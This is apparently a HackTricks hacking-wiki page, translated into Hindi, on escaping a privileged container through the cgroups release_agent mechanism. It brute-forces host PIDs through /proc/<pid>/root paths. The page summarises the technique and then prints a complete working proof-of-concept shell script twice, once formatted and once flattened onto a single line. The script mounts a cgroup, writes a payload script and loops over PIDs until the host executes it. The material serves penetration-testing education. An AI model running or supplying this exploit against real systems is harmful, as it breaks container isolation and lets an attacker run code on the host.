release_agent exploit - Relative Paths to PIDs

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

अधिक जानकारी के लिए https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html से ब्लॉग पोर्ट की जांच करें। यह केवल एक सारांश है:

यह तकनीक कंटेनर के भीतर से होस्ट कोड निष्पादित करने के लिए एक विधि का वर्णन करती है, जो स्टोरेज-ड्राइवर कॉन्फ़िगरेशन द्वारा उत्पन्न चुनौतियों को पार करती है जो होस्ट पर कंटेनर की फ़ाइल प्रणाली के पथ को अस्पष्ट करती हैं, जैसे कि काता कंटेनर या विशिष्ट devicemapper सेटिंग्स।

मुख्य चरण:

प्रोसेस आईडी (PIDs) का पता लगाना: लिनक्स प्सेडो-फाइल सिस्टम में /proc/<pid>/root प्रतीकात्मक लिंक का उपयोग करके, कंटेनर के भीतर किसी भी फ़ाइल को होस्ट की फ़ाइल प्रणाली के सापेक्ष एक्सेस किया जा सकता है। यह होस्ट पर कंटेनर की फ़ाइल प्रणाली के पथ को जानने की आवश्यकता को दरकिनार करता है।
PID बाशिंग: होस्ट पर PIDs के माध्यम से खोजने के लिए एक ब्रूट फोर्स दृष्टिकोण का उपयोग किया जाता है। यह /proc/<pid>/root/<file> पर एक विशिष्ट फ़ाइल की उपस्थिति की जांच करके किया जाता है। जब फ़ाइल मिलती है, तो यह संकेत करता है कि संबंधित PID उस प्रक्रिया से संबंधित है जो लक्षित कंटेनर के भीतर चल रही है।
निष्पादन को ट्रिगर करना: अनुमानित PID पथ को cgroups release_agent फ़ाइल में लिखा जाता है। यह क्रिया release_agent के निष्पादन को ट्रिगर करती है। इस चरण की सफलता की पुष्टि आउटपुट फ़ाइल के निर्माण की जांच करके की जाती है।

शोषण प्रक्रिया

शोषण प्रक्रिया में अधिक विस्तृत क्रियाओं का एक सेट शामिल है, जिसका उद्देश्य कंटेनर के भीतर चल रही प्रक्रिया के सही PID का अनुमान लगाकर होस्ट पर एक पेलोड निष्पादित करना है। यह इस प्रकार विकसित होता है:

पर्यावरण को प्रारंभ करें: होस्ट पर एक पेलोड स्क्रिप्ट (payload.sh) तैयार की जाती है, और cgroup हेरफेर के लिए एक अद्वितीय निर्देशिका बनाई जाती है।
पेलोड तैयार करें: पेलोड स्क्रिप्ट, जिसमें होस्ट पर निष्पादित होने वाले आदेश होते हैं, लिखी जाती है और इसे निष्पादन योग्य बनाया जाता है।
Cgroup सेट करें: cgroup को माउंट और कॉन्फ़िगर किया जाता है। यह सुनिश्चित करने के लिए notify_on_release ध्वज सेट किया जाता है कि जब cgroup को जारी किया जाता है तो पेलोड निष्पादित होता है।
ब्रूट फोर्स PID: एक लूप संभावित PIDs के माध्यम से दोहराता है, प्रत्येक अनुमानित PID को release_agent फ़ाइल में लिखता है। यह प्रभावी रूप से पेलोड स्क्रिप्ट को release_agent के रूप में सेट करता है।
निष्पादन को ट्रिगर और जांचें: प्रत्येक PID के लिए, cgroup का cgroup.procs लिखा जाता है, यदि PID सही है तो release_agent के निष्पादन को ट्रिगर करता है। लूप तब तक जारी रहता है जब तक पेलोड स्क्रिप्ट का आउटपुट नहीं मिल जाता, जो सफल निष्पादन को इंगित करता है।

ब्लॉग पोस्ट से PoC:

#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
if [ $((${TPID} % 100)) -eq 0 ]
then
echo "Checking pid ${TPID}"
if [ ${TPID} -gt ${MAX_PID} ]
then
echo "Exiting at ${MAX_PID} :-("
exit 1
fi
fi
# Set the release_agent path to the guessed pid
echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
# Trigger execution of the release_agent
sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करें।

PreviousDocker Breakout / Privilege Escalation NextDocker release_agent cgroups escape

Last updated 4 months ago

#!/bin/sh OUTPUT_DIR="/" MAX_PID=65535 CGROUP_NAME="xyx" CGROUP_MOUNT="/tmp/cgrp" PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" OUTPUT_NAME="${CGROUP_NAME}_payload.out" OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" # Run a process for which we can search for (not needed in reality, but nice to have) sleep 10000 & # Prepare the payload script to execute on the host cat > ${PAYLOAD_PATH} << __EOF__ #!/bin/sh OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} # Commands to run on the host< ps -eaf > \${OUTPATH} 2>&1 __EOF__ # Make the payload script executable chmod a+x ${PAYLOAD_PATH} # Set up the cgroup mount using the memory resource cgroup controller mkdir ${CGROUP_MOUNT} mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release # Brute force the host pid until the output path is created, or we run out of guesses TPID=1 while [ ! -f ${OUTPUT_PATH} ] do if [ $((${TPID} % 100)) -eq 0 ] then echo "Checking pid ${TPID}" if [ ${TPID} -gt ${MAX_PID} ] then echo "Exiting at ${MAX_PID} :-(" exit 1 fi fi # Set the release_agent path to the guessed pid echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent # Trigger execution of the release_agent sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" TPID=$((${TPID} + 1)) done # Wait for and cat the output sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH}